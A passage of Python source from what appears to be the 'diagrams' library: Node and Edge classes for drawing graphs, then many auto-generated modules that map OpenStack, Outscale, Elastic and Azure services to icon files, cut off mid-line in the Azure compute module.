Other node instance. :param edge: Type of the edge. :return: Connected node. """ if not isinstance(node, Node): ValueError(f"{node} is not a valid Node") if not isinstance(edge, Edge): ValueError(f"{edge} is not a valid Edge") # An edge must be added on the global diagrams, not a cluster. self._diagram.connect(self, node, edge) return node @staticmethod def _rand_id(): return uuid.uuid4().hex def _load_icon(self): basedir = Path(os.path.abspath(os.path.dirname(__file__))) return os.path.join(basedir.parent, self._icon_dir, self._icon) class Edge: """Edge represents an edge between two nodes.""" _default_edge_attrs = { "fontcolor": "#2D3436", "fontname": "Sans-Serif", "fontsize": "13", } def __init__( self, node: "Node" = None, forward: bool = False, reverse: bool = False, label: str = "", color: str = "", style: str = "", **attrs: Dict, ): """Edge represents an edge between two nodes. :param node: Parent node. :param forward: Points forward. :param reverse: Points backward. :param label: Edge label. :param color: Edge color. :param style: Edge style. 
:param attrs: Other edge attributes """ if node is not None: assert isinstance(node, Node) self.node = node self.forward = forward self.reverse = reverse self._attrs = {} # Set attributes. for k, v in self._default_edge_attrs.items(): self._attrs[k] = v if label: # Graphviz complaining about using label for edges, so replace it with xlabel. # Update: xlabel option causes the misaligned label position: https://github.com/mingrammer/diagrams/issues/83 self._attrs["label"] = label if color: self._attrs["color"] = color if style: self._attrs["style"] = style self._attrs.update(attrs) def __sub__(self, other: Union["Node", "Edge", List["Node"]]): """Implement Self - Node or Edge and Self - [Nodes]""" return self.connect(other) def __rsub__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] - Self because list don't have __sub__ operators.""" return self.append(other) def __rshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self >> Node or Edge and Self >> [Nodes].""" self.forward = True return self.connect(other) def __lshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self << Node or Edge and Self << [Nodes].""" self.reverse = True return self.connect(other) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] >> Self because list of Edges don't have __rshift__ operators.""" return self.append(other, forward=True) def __rlshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] << Self because list of Edges don't have __lshift__ operators.""" return self.append(other, reverse=True) def append(self, other: Union[List["Node"], List["Edge"]], forward=None, reverse=None) -> List["Edge"]: result = [] for o in other: if isinstance(o, Edge): o.forward = forward if forward else o.forward o.reverse = forward if forward else o.reverse self._attrs = o.attrs.copy() result.append(o) else: result.append(Edge(o, forward=forward, reverse=reverse, **self._attrs)) return result def connect(self, other: Union["Node", "Edge", List["Node"]]): if isinstance(other, list): for node in other: self.node.connect(node, self) return other elif isinstance(other, Edge): self._attrs = other._attrs.copy() return self else: if self.node is not None: return self.node.connect(other, self) else: self.node = other return self @property def attrs(self) -> Dict: if self.forward and self.reverse: direction = "both" elif self.forward: direction = "forward" elif self.reverse: direction = "back" else: direction = "none" return {**self._attrs, "dir": direction} Group = Cluster File: diagrams/openstack/containerservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Containerservices(_OpenStack): _type = "containerservices" _icon_dir = "resources/openstack/containerservices" class Kuryr(_Containerservices): _icon = "kuryr.png" # Aliases File: diagrams/openstack/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _User(_OpenStack): _type = "user" _icon_dir = "resources/openstack/user" class Openstackclient(_User): _icon = "openstackclient.png" # Aliases OpenStackClient = Openstackclient File: diagrams/openstack/billing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OpenStack class _Billing(_OpenStack): _type = "billing" _icon_dir = "resources/openstack/billing" class Cloudkitty(_Billing): _icon = "cloudkitty.png" # Aliases CloudKitty = Cloudkitty File: diagrams/openstack/sharedservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Sharedservices(_OpenStack): _type = "sharedservices" _icon_dir = "resources/openstack/sharedservices" class Barbican(_Sharedservices): _icon = "barbican.png" class Glance(_Sharedservices): _icon = "glance.png" class Karbor(_Sharedservices): _icon = "karbor.png" class Keystone(_Sharedservices): _icon = "keystone.png" class Searchlight(_Sharedservices): _icon = "searchlight.png" # Aliases File: diagrams/openstack/deployment.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Deployment(_OpenStack): _type = "deployment" _icon_dir = "resources/openstack/deployment" class Ansible(_Deployment): _icon = "ansible.png" class Charms(_Deployment): _icon = "charms.png" class Chef(_Deployment): _icon = "chef.png" class Helm(_Deployment): _icon = "helm.png" class Kolla(_Deployment): _icon = "kolla.png" class Tripleo(_Deployment): _icon = "tripleo.png" # Aliases KollaAnsible = Kolla TripleO = Tripleo File: diagrams/openstack/workloadprovisioning.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Workloadprovisioning(_OpenStack): _type = "workloadprovisioning" _icon_dir = "resources/openstack/workloadprovisioning" class Magnum(_Workloadprovisioning): _icon = "magnum.png" class Sahara(_Workloadprovisioning): _icon = "sahara.png" class Trove(_Workloadprovisioning): _icon = "trove.png" # Aliases File: diagrams/openstack/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Monitoring(_OpenStack): _type = "monitoring" _icon_dir = "resources/openstack/monitoring" class Monasca(_Monitoring): _icon = "monasca.png" class Telemetry(_Monitoring): _icon = "telemetry.png" # Aliases File: diagrams/openstack/lifecyclemanagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Lifecyclemanagement(_OpenStack): _type = "lifecyclemanagement" _icon_dir = "resources/openstack/lifecyclemanagement" # Aliases File: diagrams/openstack/baremetal.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Baremetal(_OpenStack): _type = "baremetal" _icon_dir = "resources/openstack/baremetal" class Cyborg(_Baremetal): _icon = "cyborg.png" class Ironic(_Baremetal): _icon = "ironic.png" # Aliases File: diagrams/openstack/optimization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Optimization(_OpenStack): _type = "optimization" _icon_dir = "resources/openstack/optimization" class Congress(_Optimization): _icon = "congress.png" class Rally(_Optimization): _icon = "rally.png" class Vitrage(_Optimization): _icon = "vitrage.png" class Watcher(_Optimization): _icon = "watcher.png" # Aliases File: diagrams/openstack/frontend.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Frontend(_OpenStack): _type = "frontend" _icon_dir = "resources/openstack/frontend" class Horizon(_Frontend): _icon = "horizon.png" # Aliases File: diagrams/openstack/__init__.py """ Openstack provides a set of general OpenStack services. 
""" from diagrams import Node class _OpenStack(Node): _provider = "openstack" _icon_dir = "resources/openstack" fontcolor = "#ffffff" File: diagrams/openstack/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Orchestration(_OpenStack): _type = "orchestration" _icon_dir = "resources/openstack/orchestration" class Blazar(_Orchestration): _icon = "blazar.png" class Heat(_Orchestration): _icon = "heat.png" class Mistral(_Orchestration): _icon = "mistral.png" class Senlin(_Orchestration): _icon = "senlin.png" class Zaqar(_Orchestration): _icon = "zaqar.png" # Aliases File: diagrams/openstack/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Operations(_OpenStack): _type = "operations" _icon_dir = "resources/openstack/operations" # Aliases File: diagrams/openstack/nfv.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _NFV(_OpenStack): _type = "nfv" _icon_dir = "resources/openstack/nfv" class Tacker(_NFV): _icon = "tacker.png" # Aliases File: diagrams/openstack/networking.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Networking(_OpenStack): _type = "networking" _icon_dir = "resources/openstack/networking" class Designate(_Networking): _icon = "designate.png" class Neutron(_Networking): _icon = "neutron.png" class Octavia(_Networking): _icon = "octavia.png" # Aliases File: diagrams/openstack/packaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Packaging(_OpenStack): _type = "packaging" _icon_dir = "resources/openstack/packaging" class LOCI(_Packaging): _icon = "loci.png" class Puppet(_Packaging): _icon = "puppet.png" class RPM(_Packaging): _icon = "rpm.png" # Aliases File: diagrams/openstack/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Storage(_OpenStack): _type = "storage" _icon_dir = "resources/openstack/storage" class Cinder(_Storage): _icon = "cinder.png" class Manila(_Storage): _icon = "manila.png" class Swift(_Storage): _icon = "swift.png" # Aliases File: diagrams/openstack/adjacentenablers.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Adjacentenablers(_OpenStack): _type = "adjacentenablers" _icon_dir = "resources/openstack/adjacentenablers" # Aliases File: diagrams/openstack/apiproxies.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Apiproxies(_OpenStack): _type = "apiproxies" _icon_dir = "resources/openstack/apiproxies" class EC2API(_Apiproxies): _icon = "ec2api.png" # Aliases File: diagrams/openstack/applicationlifecycle.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Applicationlifecycle(_OpenStack): _type = "applicationlifecycle" _icon_dir = "resources/openstack/applicationlifecycle" class Freezer(_Applicationlifecycle): _icon = "freezer.png" class Masakari(_Applicationlifecycle): _icon = "masakari.png" class Murano(_Applicationlifecycle): _icon = "murano.png" class Solum(_Applicationlifecycle): _icon = "solum.png" # Aliases File: diagrams/openstack/multiregion.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OpenStack class _Multiregion(_OpenStack): _type = "multiregion" _icon_dir = "resources/openstack/multiregion" class Tricircle(_Multiregion): _icon = "tricircle.png" # Aliases File: diagrams/openstack/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Compute(_OpenStack): _type = "compute" _icon_dir = "resources/openstack/compute" class Nova(_Compute): _icon = "nova.png" class Qinling(_Compute): _icon = "qinling.png" class Zun(_Compute): _icon = "zun.png" # Aliases File: diagrams/outscale/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Security(_Outscale): _type = "security" _icon_dir = "resources/outscale/security" class Firewall(_Security): _icon = "firewall.png" class IdentityAndAccessManagement(_Security): _icon = "identity-and-access-management.png" # Aliases File: diagrams/outscale/__init__.py from diagrams import Node class _Outscale(Node): _provider = "outscale" _icon_dir = "resources/outscale" fontcolor = "#ffffff" File: diagrams/outscale/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Storage(_Outscale): _type = "storage" _icon_dir = "resources/outscale/storage" class SimpleStorageService(_Storage): _icon = "simple-storage-service.png" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/outscale/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Network(_Outscale): _type = "network" _icon_dir = "resources/outscale/network" class ClientVpn(_Network): _icon = "client-vpn.png" class InternetService(_Network): _icon = "internet-service.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class NatService(_Network): _icon = "nat-service.png" class Net(_Network): _icon = "net.png" class SiteToSiteVpng(_Network): _icon = "site-to-site-vpng.png" # Aliases File: diagrams/outscale/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Compute(_Outscale): _type = "compute" _icon_dir = "resources/outscale/compute" class Compute(_Compute): _icon = "compute.png" class DirectConnect(_Compute): _icon = "direct-connect.png" # Aliases File: diagrams/elastic/elasticsearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Elasticsearch(_Elastic): _type = "elasticsearch" _icon_dir = "resources/elastic/elasticsearch" class Alerting(_Elasticsearch): _icon = "alerting.png" class Beats(_Elasticsearch): _icon = "beats.png" class Elasticsearch(_Elasticsearch): _icon = "elasticsearch.png" class Kibana(_Elasticsearch): _icon = "kibana.png" class LogstashPipeline(_Elasticsearch): _icon = "logstash-pipeline.png" class Logstash(_Elasticsearch): _icon = "logstash.png" class MachineLearning(_Elasticsearch): _icon = "machine-learning.png" class MapServices(_Elasticsearch): _icon = "map-services.png" class Maps(_Elasticsearch): _icon = "maps.png" class Monitoring(_Elasticsearch): _icon = "monitoring.png" class SearchableSnapshots(_Elasticsearch): _icon = "searchable-snapshots.png" class SecuritySettings(_Elasticsearch): _icon = "security-settings.png" class SQL(_Elasticsearch): _icon = "sql.png" class Stack(_Elasticsearch): _icon = "stack.png" # Aliases ElasticSearch = Elasticsearch LogStash = Logstash ML = MachineLearning File: diagrams/elastic/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. 
from . import _Elastic class _Security(_Elastic): _type = "security" _icon_dir = "resources/elastic/security" class Endpoint(_Security): _icon = "endpoint.png" class Security(_Security): _icon = "security.png" class SIEM(_Security): _icon = "siem.png" class Xdr(_Security): _icon = "xdr.png" # Aliases File: diagrams/elastic/saas.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Saas(_Elastic): _type = "saas" _icon_dir = "resources/elastic/saas" class Cloud(_Saas): _icon = "cloud.png" class Elastic(_Saas): _icon = "elastic.png" # Aliases File: diagrams/elastic/__init__.py """ Elastic provides a set of general elastic services. """ from diagrams import Node class _Elastic(Node): _provider = "elastic" _icon_dir = "resources/elastic" fontcolor = "#ffffff" File: diagrams/elastic/observability.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Observability(_Elastic): _type = "observability" _icon_dir = "resources/elastic/observability" class APM(_Observability): _icon = "apm.png" class Logs(_Observability): _icon = "logs.png" class Metrics(_Observability): _icon = "metrics.png" class Observability(_Observability): _icon = "observability.png" class Uptime(_Observability): _icon = "uptime.png" # Aliases File: diagrams/elastic/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Orchestration(_Elastic): _type = "orchestration" _icon_dir = "resources/elastic/orchestration" class ECE(_Orchestration): _icon = "ece.png" class ECK(_Orchestration): _icon = "eck.png" # Aliases File: diagrams/elastic/beats.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Beats(_Elastic): _type = "beats" _icon_dir = "resources/elastic/beats" class APM(_Beats): _icon = "apm.png" class Auditbeat(_Beats): _icon = "auditbeat.png" class Filebeat(_Beats): _icon = "filebeat.png" class Functionbeat(_Beats): _icon = "functionbeat.png" class Heartbeat(_Beats): _icon = "heartbeat.png" class Metricbeat(_Beats): _icon = "metricbeat.png" class Packetbeat(_Beats): _icon = "packetbeat.png" class Winlogbeat(_Beats): _icon = "winlogbeat.png" # Aliases File: diagrams/elastic/agent.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Agent(_Elastic): _type = "agent" _icon_dir = "resources/elastic/agent" class Agent(_Agent): _icon = "agent.png" class Endpoint(_Agent): _icon = "endpoint.png" class Fleet(_Agent): _icon = "fleet.png" class Integrations(_Agent): _icon = "integrations.png" # Aliases File: diagrams/elastic/enterprisesearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Enterprisesearch(_Elastic): _type = "enterprisesearch" _icon_dir = "resources/elastic/enterprisesearch" class AppSearch(_Enterprisesearch): _icon = "app-search.png" class Crawler(_Enterprisesearch): _icon = "crawler.png" class EnterpriseSearch(_Enterprisesearch): _icon = "enterprise-search.png" class SiteSearch(_Enterprisesearch): _icon = "site-search.png" class WorkplaceSearch(_Enterprisesearch): _icon = "workplace-search.png" # Aliases File: diagrams/azure/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Web(_Azure): _type = "web" _icon_dir = "resources/azure/web" class APIConnections(_Web): _icon = "api-connections.png" class AppServiceCertificates(_Web): _icon = "app-service-certificates.png" class AppServiceDomains(_Web): _icon = "app-service-domains.png" class AppServiceEnvironments(_Web): _icon = "app-service-environments.png" class AppServicePlans(_Web): _icon = "app-service-plans.png" class AppServices(_Web): _icon = "app-services.png" class MediaServices(_Web): _icon = "media-services.png" class NotificationHubNamespaces(_Web): _icon = "notification-hub-namespaces.png" class Search(_Web): _icon = "search.png" class Signalr(_Web): _icon = "signalr.png" # Aliases File: diagrams/azure/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Database(_Azure): _type = "database" _icon_dir = "resources/azure/database" class BlobStorage(_Database): _icon = "blob-storage.png" class CacheForRedis(_Database): _icon = "cache-for-redis.png" class CosmosDb(_Database): _icon = "cosmos-db.png" class DataExplorerClusters(_Database): _icon = "data-explorer-clusters.png" class DataFactory(_Database): _icon = "data-factory.png" class DataLake(_Database): _icon = "data-lake.png" class DatabaseForMariadbServers(_Database): _icon = "database-for-mariadb-servers.png" class DatabaseForMysqlServers(_Database): _icon = "database-for-mysql-servers.png" class DatabaseForPostgresqlServers(_Database): _icon = "database-for-postgresql-servers.png" class ElasticDatabasePools(_Database): _icon = "elastic-database-pools.png" class ElasticJobAgents(_Database): _icon = "elastic-job-agents.png" class InstancePools(_Database): _icon = "instance-pools.png" class ManagedDatabases(_Database): _icon = "managed-databases.png" class SQLDatabases(_Database): _icon = "sql-databases.png" class SQLDatawarehouse(_Database): _icon = "sql-datawarehouse.png" class SQLManagedInstances(_Database): _icon = "sql-managed-instances.png" class SQLServerStretchDatabases(_Database): _icon = "sql-server-stretch-databases.png" class SQLServers(_Database): _icon = "sql-servers.png" class SQLVM(_Database): _icon = "sql-vm.png" class SQL(_Database): _icon = "sql.png" class SsisLiftAndShiftIr(_Database): _icon = "ssis-lift-and-shift-ir.png" class SynapseAnalytics(_Database): _icon = "synapse-analytics.png" class VirtualClusters(_Database): _icon = "virtual-clusters.png" class VirtualDatacenter(_Database): _icon = "virtual-datacenter.png" # Aliases File: diagrams/azure/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Security(_Azure): _type = "security" _icon_dir = "resources/azure/security" class ApplicationSecurityGroups(_Security): _icon = "application-security-groups.png" class ConditionalAccess(_Security): _icon = "conditional-access.png" class Defender(_Security): _icon = "defender.png" class ExtendedSecurityUpdates(_Security): _icon = "extended-security-updates.png" class KeyVaults(_Security): _icon = "key-vaults.png" class SecurityCenter(_Security): _icon = "security-center.png" class Sentinel(_Security): _icon = "sentinel.png" # Aliases File: diagrams/azure/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Mobile(_Azure): _type = "mobile" _icon_dir = "resources/azure/mobile" class AppServiceMobile(_Mobile): _icon = "app-service-mobile.png" class MobileEngagement(_Mobile): _icon = "mobile-engagement.png" class NotificationHubs(_Mobile): _icon = "notification-hubs.png" # Aliases File: diagrams/azure/__init__.py """ Azure provides a set of services for Microsoft Azure provider. """ from diagrams import Node class _Azure(Node): _provider = "azure" _icon_dir = "resources/azure" fontcolor = "#ffffff" File: diagrams/azure/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Devops(_Azure): _type = "devops" _icon_dir = "resources/azure/devops" class ApplicationInsights(_Devops): _icon = "application-insights.png" class Artifacts(_Devops): _icon = "artifacts.png" class Boards(_Devops): _icon = "boards.png" class Devops(_Devops): _icon = "devops.png" class DevtestLabs(_Devops): _icon = "devtest-labs.png" class LabServices(_Devops): _icon = "lab-services.png" class Pipelines(_Devops): _icon = "pipelines.png" class Repos(_Devops): _icon = "repos.png" class TestPlans(_Devops): _icon = "test-plans.png" # Aliases File: diagrams/azure/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Integration(_Azure): _type = "integration" _icon_dir = "resources/azure/integration" class APIForFhir(_Integration): _icon = "api-for-fhir.png" class APIManagement(_Integration): _icon = "api-management.png" class AppConfiguration(_Integration): _icon = "app-configuration.png" class DataCatalog(_Integration): _icon = "data-catalog.png" class EventGridDomains(_Integration): _icon = "event-grid-domains.png" class EventGridSubscriptions(_Integration): _icon = "event-grid-subscriptions.png" class EventGridTopics(_Integration): _icon = "event-grid-topics.png" class IntegrationAccounts(_Integration): _icon = "integration-accounts.png" class IntegrationServiceEnvironments(_Integration): _icon = "integration-service-environments.png" class LogicAppsCustomConnector(_Integration): _icon = "logic-apps-custom-connector.png" class LogicApps(_Integration): _icon = "logic-apps.png" class PartnerTopic(_Integration): _icon = "partner-topic.png" class SendgridAccounts(_Integration): _icon = "sendgrid-accounts.png" class ServiceBusRelays(_Integration): _icon = "service-bus-relays.png" class ServiceBus(_Integration): _icon = "service-bus.png" class ServiceCatalogManagedApplicationDefinitions(_Integration): _icon = "service-catalog-managed-application-definitions.png" class SoftwareAsAService(_Integration): _icon = "software-as-a-service.png" class StorsimpleDeviceManagers(_Integration): _icon = "storsimple-device-managers.png" class SystemTopic(_Integration): _icon = "system-topic.png" # Aliases File: diagrams/azure/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Ml(_Azure): _type = "ml" _icon_dir = "resources/azure/ml" class BatchAI(_Ml): _icon = "batch-ai.png" class BotServices(_Ml): _icon = "bot-services.png" class CognitiveServices(_Ml): _icon = "cognitive-services.png" class GenomicsAccounts(_Ml): _icon = "genomics-accounts.png" class MachineLearningServiceWorkspaces(_Ml): _icon = "machine-learning-service-workspaces.png" class MachineLearningStudioWebServicePlans(_Ml): _icon = "machine-learning-studio-web-service-plans.png" class MachineLearningStudioWebServices(_Ml): _icon = "machine-learning-studio-web-services.png" class MachineLearningStudioWorkspaces(_Ml): _icon = "machine-learning-studio-workspaces.png" # Aliases File: diagrams/azure/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Storage(_Azure): _type = "storage" _icon_dir = "resources/azure/storage" class ArchiveStorage(_Storage): _icon = "archive-storage.png" class Azurefxtedgefiler(_Storage): _icon = "azurefxtedgefiler.png" class BlobStorage(_Storage): _icon = "blob-storage.png" class DataBoxEdgeDataBoxGateway(_Storage): _icon = "data-box-edge-data-box-gateway.png" class DataBox(_Storage): _icon = "data-box.png" class DataLakeStorage(_Storage): _icon = "data-lake-storage.png" class GeneralStorage(_Storage): _icon = "general-storage.png" class NetappFiles(_Storage): _icon = "netapp-files.png" class QueuesStorage(_Storage): _icon = "queues-storage.png" class StorageAccountsClassic(_Storage): _icon = "storage-accounts-classic.png" class StorageAccounts(_Storage): _icon = "storage-accounts.png" class StorageExplorer(_Storage): _icon = "storage-explorer.png" class StorageSyncServices(_Storage): _icon = "storage-sync-services.png" class StorsimpleDataManagers(_Storage): _icon = "storsimple-data-managers.png" class StorsimpleDeviceManagers(_Storage): _icon = "storsimple-device-managers.png" class TableStorage(_Storage): _icon = "table-storage.png" # Aliases File: diagrams/azure/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Network(_Azure): _type = "network" _icon_dir = "resources/azure/network" class ApplicationGateway(_Network): _icon = "application-gateway.png" class ApplicationSecurityGroups(_Network): _icon = "application-security-groups.png" class CDNProfiles(_Network): _icon = "cdn-profiles.png" class Connections(_Network): _icon = "connections.png" class DDOSProtectionPlans(_Network): _icon = "ddos-protection-plans.png" class DNSPrivateZones(_Network): _icon = "dns-private-zones.png" class DNSZones(_Network): _icon = "dns-zones.png" class ExpressrouteCircuits(_Network): _icon = "expressroute-circuits.png" class Firewall(_Network): _icon = "firewall.png" class FrontDoors(_Network): _icon = "front-doors.png" class LoadBalancers(_Network): _icon = "load-balancers.png" class LocalNetworkGateways(_Network): _icon = "local-network-gateways.png" class NetworkInterfaces(_Network): _icon = "network-interfaces.png" class NetworkSecurityGroupsClassic(_Network): _icon = "network-security-groups-classic.png" class NetworkWatcher(_Network): _icon = "network-watcher.png" class OnPremisesDataGateways(_Network): _icon = "on-premises-data-gateways.png" class PrivateEndpoint(_Network): _icon = "private-endpoint.png" class PublicIpAddresses(_Network): _icon = "public-ip-addresses.png" class ReservedIpAddressesClassic(_Network): _icon = "reserved-ip-addresses-classic.png" class RouteFilters(_Network): _icon = "route-filters.png" class RouteTables(_Network): _icon = "route-tables.png" class ServiceEndpointPolicies(_Network): _icon = "service-endpoint-policies.png" class Subnets(_Network): _icon = "subnets.png" class TrafficManagerProfiles(_Network): _icon = "traffic-manager-profiles.png" class VirtualNetworkClassic(_Network): _icon = "virtual-network-classic.png" class VirtualNetworkGateways(_Network): _icon = "virtual-network-gateways.png" class VirtualNetworks(_Network): _icon = "virtual-networks.png" class VirtualWans(_Network): _icon = "virtual-wans.png" # Aliases File: diagrams/azure/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Analytics(_Azure): _type = "analytics" _icon_dir = "resources/azure/analytics" class AnalysisServices(_Analytics): _icon = "analysis-services.png" class DataExplorerClusters(_Analytics): _icon = "data-explorer-clusters.png" class DataFactories(_Analytics): _icon = "data-factories.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class DataLakeStoreGen1(_Analytics): _icon = "data-lake-store-gen1.png" class Databricks(_Analytics): _icon = "databricks.png" class EventHubClusters(_Analytics): _icon = "event-hub-clusters.png" class EventHubs(_Analytics): _icon = "event-hubs.png" class Hdinsightclusters(_Analytics): _icon = "hdinsightclusters.png" class LogAnalyticsWorkspaces(_Analytics): _icon = "log-analytics-workspaces.png" class StreamAnalyticsJobs(_Analytics): _icon = "stream-analytics-jobs.png" class SynapseAnalytics(_Analytics): _icon = "synapse-analytics.png" # Aliases File: diagrams/azure/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _Migration(_Azure): _type = "migration" _icon_dir = "resources/azure/migration" class DataBoxEdge(_Migration): _icon = "data-box-edge.png" class DataBox(_Migration): _icon = "data-box.png" class DatabaseMigrationServices(_Migration): _icon = "database-migration-services.png" class MigrationProjects(_Migration): _icon = "migration-projects.png" class RecoveryServicesVaults(_Migration): _icon = "recovery-services-vaults.png" # Aliases File: diagrams/azure/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Identity(_Azure): _type = "identity" _icon_dir = "resources/azure/identity" class AccessReview(_Identity): _icon = "access-review.png" class ActiveDirectoryConnectHealth(_Identity): _icon = "active-directory-connect-health.png" class ActiveDirectory(_Identity): _icon = "active-directory.png" class ADB2C(_Identity): _icon = "ad-b2c.png" class ADDomainServices(_Identity): _icon = "ad-domain-services.png" class ADIdentityProtection(_Identity): _icon = "ad-identity-protection.png" class ADPrivilegedIdentityManagement(_Identity): _icon = "ad-privileged-identity-management.png" class AppRegistrations(_Identity): _icon = "app-registrations.png" class ConditionalAccess(_Identity): _icon = "conditional-access.png" class EnterpriseApplications(_Identity): _icon = "enterprise-applications.png" class Groups(_Identity): _icon = "groups.png" class IdentityGovernance(_Identity): _icon = "identity-governance.png" class InformationProtection(_Identity): _icon = "information-protection.png" class ManagedIdentities(_Identity): _icon = "managed-identities.png" class Users(_Identity): _icon = "users.png" # Aliases File: diagrams/azure/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Iot(_Azure): _type = "iot" _icon_dir = "resources/azure/iot" class DeviceProvisioningServices(_Iot): _icon = "device-provisioning-services.png" class DigitalTwins(_Iot): _icon = "digital-twins.png" class IotCentralApplications(_Iot): _icon = "iot-central-applications.png" class IotHubSecurity(_Iot): _icon = "iot-hub-security.png" class IotHub(_Iot): _icon = "iot-hub.png" class Maps(_Iot): _icon = "maps.png" class Sphere(_Iot): _icon = "sphere.png" class TimeSeriesInsightsEnvironments(_Iot): _icon = "time-series-insights-environments.png" class TimeSeriesInsightsEventsSources(_Iot): _icon = "time-series-insights-events-sources.png" class Windows10IotCoreServices(_Iot): _icon = "windows-10-iot-core-services.png" # Aliases File: diagrams/azure/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Azure class _General(_Azure): _type = "general" _icon_dir = "resources/azure/general" class Allresources(_General): _icon = "allresources.png" class Azurehome(_General): _icon = "azurehome.png" class Developertools(_General): _icon = "developertools.png" class Helpsupport(_General): _icon = "helpsupport.png" class Information(_General): _icon = "information.png" class Managementgroups(_General): _icon = "managementgroups.png" class Marketplace(_General): _icon = "marketplace.png" class Quickstartcenter(_General): _icon = "quickstartcenter.png" class Recent(_General): _icon = "recent.png" class Reservations(_General): _icon = "reservations.png" class Resource(_General): _icon = "resource.png" class Resourcegroups(_General): _icon = "resourcegroups.png" class Servicehealth(_General): _icon = "servicehealth.png" class Shareddashboard(_General): _icon = "shareddashboard.png" class Subscriptions(_General): _icon = "subscriptions.png" class Support(_General): _icon = "support.png" class Supportrequests(_General): _icon = "supportrequests.png" class Tag(_General): _icon = "tag.png" class Tags(_General): _icon = "tags.png" class Templates(_General): _icon = "templates.png" class Twousericon(_General): _icon = "twousericon.png" class Userhealthicon(_General): _icon = "userhealthicon.png" class Usericon(_General): _icon = "usericon.png" class Userprivacy(_General): _icon = "userprivacy.png" class Userresource(_General): _icon = "userresource.png" class Whatsnew(_General): _icon = "whatsnew.png" # Aliases File: diagrams/azure/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Compute(_Azure): _type = "compute" _icon_dir = "resources/azure/compute" class AppServices(_Compute): _icon = "app-services.png" class AutomanagedVM(_Compute): _icon = "automanaged-vm.png" class AvailabilitySets(_Compute): _icon = "availability-sets.png" class BatchAccounts(_Compute): _icon = "batch-accounts.png" class CitrixVirtualDesktopsEssentials(_Compute): _icon = "citrix-virtual-desktops-essentials.png" class CloudServicesClassic(_Compute): _icon = "cloud-services-classic.png" class CloudServices(_Compute): _icon = "cloud-services.png" class CloudsimpleVirtualMachines(_Compute): _icon = "cloudsimple-virtual-machines.png" class ContainerApps(_Compute): _icon = "container-apps.png" class ContainerInstances(_Compute): _icon = "container-instances.png" class ContainerRegistries(_Compute): _icon = "container-registries.png" class DiskEncryptionSets(_Compute): _icon = "disk-encryption-sets.png" class DiskSnapshots(_Compute): _icon 